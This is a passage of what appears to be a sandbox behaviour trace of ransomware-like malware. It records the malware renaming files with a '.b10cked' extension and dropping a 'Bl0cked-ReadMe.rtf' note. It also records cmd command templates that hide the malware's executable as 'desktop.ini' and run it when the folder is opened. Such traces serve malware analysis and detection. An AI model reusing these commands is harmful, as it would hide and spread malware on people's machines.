lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26848874672) returned 1 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.701] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0211.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0211.701] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0211.701] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0211.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0211.702] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0211.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0211.702] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0211.702] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0211.702] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0211.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE Add-on site.url", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0211.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IE Add-on site.url", cchWideChar=18, lpMultiByteStr=0x13286a4, 
cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IE Add-on site.url", lpUsedDefaultChar=0x0) returned 18 [0211.707] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0211.707] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0211.707] CloseHandle (hObject=0x120) returned 1 [0211.707] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL") returned 0x2f [0211.708] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0211.708] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"", 
lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x9cc, dwThreadId=0xab8)) returned 1 [0211.710] CloseHandle (hObject=0x1b4) returned 1 [0211.710] CloseHandle (hObject=0x120) returned 1 [0211.710] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0211.710] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Links\\", cchLength=0x21 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\") returned 0x21 [0211.710] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\LINKS\\", cchCount2=33) returned 3 [0211.710] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0211.710] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0211.710] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0211.710] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0211.710] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0211.710] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0211.710] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0211.710] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0211.710] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0211.710] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x248, dwThreadId=0x848)) returned 1 [0211.712] CloseHandle (hObject=0x1b4) returned 1 [0211.712] CloseHandle (hObject=0x120) returned 1 [0211.712] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\bl0cked-readme.rtf")) returned 0xffffffff [0211.712] GetLastError () returned 0x2 [0211.712] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Favorites\\Microsoft 
Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0211.714] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\bl0cked-readme.rtf")) returned 0x20 [0211.714] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0211.714] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0211.718] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0211.718] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0211.718] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0211.719] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0211.719] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0211.719] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0211.719] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0211.719] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0211.719] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1") returned 0x22 [0211.719] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\FAVORI~1\\MICROS~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\FAVORI~1\\MICROS~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\FAVORI~1\\MICROS~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\FAVORI~1\\MICROS~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0211.719] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0211.719] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib 
+h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa50, dwThreadId=0x310)) returned 1 [0211.721] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0213.363] CloseHandle (hObject=0x120) returned 1 [0213.363] CloseHandle (hObject=0x1b4) returned 1 [0213.364] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0213.364] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0213.364] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0213.364] GetTickCount () returned 0x3bcc9 [0213.364] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=27015315854) returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x45\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6f\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x37\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0213.364] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0213.364] CharUpperBuffW (in: lpsz="explorer.exe 
\"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0213.364] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0213.364] CharUpperBuffW (in: lpsz="explorer.exe \"Microsoft Websites\" & type \"Microsoft Websites\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x75 | out: lpsz="EXPLORER.EXE \"MICROSOFT WEBSITES\" & TYPE \"MICROSOFT WEBSITES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x75 [0213.364] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0213.364] CharUpperBuffW (in: lpsz="explorer.exe \"Microsoft Websites\" & type \"Microsoft Websites\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x76 | out: lpsz="EXPLORER.EXE \"MICROSOFT WEBSITES\" & TYPE \"MICROSOFT WEBSITES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x76 [0213.364] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0213.364] CoInitialize (pvReserved=0x0) returned 0x0 [0213.365] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, 